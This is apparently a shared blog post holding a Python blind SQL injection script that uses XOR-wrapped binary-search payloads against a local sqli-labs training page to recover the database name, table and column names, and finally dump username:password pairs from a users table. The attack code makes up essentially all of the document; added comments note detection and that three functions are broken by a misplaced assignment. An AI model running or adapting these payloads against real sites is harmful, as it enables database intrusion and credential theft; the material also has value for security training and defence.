异或二分法盲注脚本分享

异或二分法盲注脚本

# -*-coding:utf-8-*-  
  
import requests  
import time  
  
# 目标url  
# Base URL of the target; the injection point is the `id` query parameter and every
# payload below is concatenated onto this string without any URL-encoding.
# Points at a local sqli-labs training instance (Less-5). `time` is imported above
# but never used.
host = "http://localhost/sqli-labs-master/Less-5/?id="
  
  
# 获取数据库名  
def get_database() -> None:
    """Recover the current database name character by character through a boolean blind oracle.

    For each 1-based position `i`, the ASCII code of `substr(database(), i, 1)` is found by
    binary search over 32..127: the predicate `ascii(...) < mid` is XOR-ed into the `id`
    parameter and the presence of "You are in" in the response body is read as "true".
    The partial name is printed after every recovered character; nothing is returned.

    Network I/O only. Reads the module-level `host` and needs the third-party `requests`
    package. No request timeout is set, so a stalled server blocks the loop indefinitely.

    Detection note: this produces roughly seven requests per recovered character, each
    carrying `ascii(substr(` and `^` in the query string -- a loud, easily logged pattern.
    The oracle exists only because the parameter is interpolated into SQL; parameterized
    queries remove it entirely.
    """
    global host  # only read here; `global` is not needed for a read
    ans: str = ''

    # 1000 is just a generous upper bound on the length; the loop normally ends earlier
    # via the break below when a position yields nothing printable.
    for i in range(1, 1000):
        low = 32
        high = 127
        mid = (low+high)//2
        # Binary search for the smallest `mid` such that ascii(char) < mid holds,
        # i.e. it converges on ascii(char) + 1.
        while low < high:
            payload = "1'^(ascii(substr((select(database())),%d,1))<%d)^1--+" % (i, mid)
            url = host + payload
            # print(url)
            # param = {"username": payload, "password": "admin"}
            # res = requests.post(host, data=param)
            res = requests.get(url)
            # "You are in" is treated as the predicate being true -> answer lies below mid.
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid = (low+high)//2
        # Converging on a boundary means substr() returned an empty/non-printable value:
        # treat it as end of string.
        if mid <= 32 or mid >= 127:
            break
        # mid is ascii(char) + 1 (see the loop comment above).
        ans += chr(mid-1)
        print("database is -> "+ans)
  
  
# 获取表名  
def get_table() -> None:
    """Recover the comma-joined list of table names in the current database, one character at a time.

    Same boolean blind binary search as `get_database`, but the probed expression is
    `group_concat(table_name)` from `information_schema.tables` filtered on the current
    schema. Prints the partial list after each character; returns nothing.

    Network I/O only; reads the module-level `host` and needs the third-party `requests`
    package. No request timeout is set.
    """
    global host  # only read here; `global` is not needed for a read
    ans: str = ''
    # 1000 is an upper bound on the concatenated length; the break below ends it earlier.
    for i in range(1, 1000):
        low = 32
        high = 127
        mid = (low+high)//2
        # Binary search converging on ascii(char) + 1 (smallest mid with ascii(char) < mid).
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1--+" % (i, mid)
            # param = {"username": payload, "password": "admin"}
            # res = requests.post(host, data=param)            url = host + payload
            # NOTE(review): the `url = host + payload` assignment above sits on the comment
            # line, so `url` is never bound in this function and the next statement raises
            # NameError on the first iteration (compare get_database, where it is its own
            # statement).
            res = requests.get(url)
            # "You are in" in the body is read as the predicate being true.
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid = (low+high)//2
        # Boundary value means no printable character at this position: end of string.
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)
  
  
# 获取列名  
def get_column() -> None:
    """Recover the comma-joined column names of the hard-coded table `users`, one character at a time.

    Same boolean blind binary search as `get_database`; the probed expression is
    `group_concat(column_name)` from `information_schema.columns` where
    `table_name='users'`. Prints the partial list after each character; returns nothing.

    Network I/O only; reads the module-level `host` and needs the third-party `requests`
    package. No request timeout is set.
    """
    global host  # only read here; `global` is not needed for a read
    ans: str = ''
    # 1000 is an upper bound on the concatenated length; the break below ends it earlier.
    for i in range(1, 1000):
        low = 32
        high = 127
        mid = (low+high)//2
        # Binary search converging on ascii(char) + 1 (smallest mid with ascii(char) < mid).
        while low < high:

            # The table name is hard-coded ('users') and has to be edited by hand.
            payload = "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1--+" % (i, mid)
            # param = {"username": payload, "password": "admin"}
            # res = requests.post(host, data=param)            url = host + payload
            # NOTE(review): as in get_table, `url = host + payload` is part of the comment
            # line above, so `url` is unbound and the next statement raises NameError.
            res = requests.get(url)
            # "You are in" in the body is read as the predicate being true.
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid = (low+high)//2
        # Boundary value means no printable character at this position: end of string.
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)
  
  
# 脱裤  
def get_data() -> None:
    """Dump `username:password` pairs from the hard-coded table `users`, one character at a time.

    Same boolean blind binary search as `get_database`; the probed expression is
    `group_concat(username, 0x3a, password)` from `users` (0x3a is the ':' separator).
    Prints the partial dump after each character; returns nothing.

    Network I/O only; reads the module-level `host` and needs the third-party `requests`
    package. No request timeout is set. The upper bound here (100000) is much larger than
    in the other functions because the concatenated row data can be long.
    """
    global host  # only read here; `global` is not needed for a read
    ans: str = ''
    for i in range(1, 100000):
        low = 32
        high = 127
        mid = (low+high)//2
        # Binary search converging on ascii(char) + 1 (smallest mid with ascii(char) < mid).
        while low < high:
            # Edit the table name and column names here; they are hard-coded.
            payload = "1'^(ascii(substr((select(group_concat(username,0x3a,password))from(users)),%d,1))<%d)^1--+" % (i, mid)
            # param = {"username": payload, "password": "admin"}
            # res = requests.post(host, data=param)            url = host + payload
            # NOTE(review): as in get_table, `url = host + payload` is part of the comment
            # line above, so `url` is unbound and the next statement raises NameError.
            res = requests.get(url)
            # "You are in" in the body is read as the predicate being true.
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid = (low+high)//2
        # Boundary value means no printable character at this position: end of string.
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)

# Runs the dump step at import/execution time (no `if __name__ == "__main__":` guard);
# get_database, get_table and get_column are defined above but never called here.
get_data()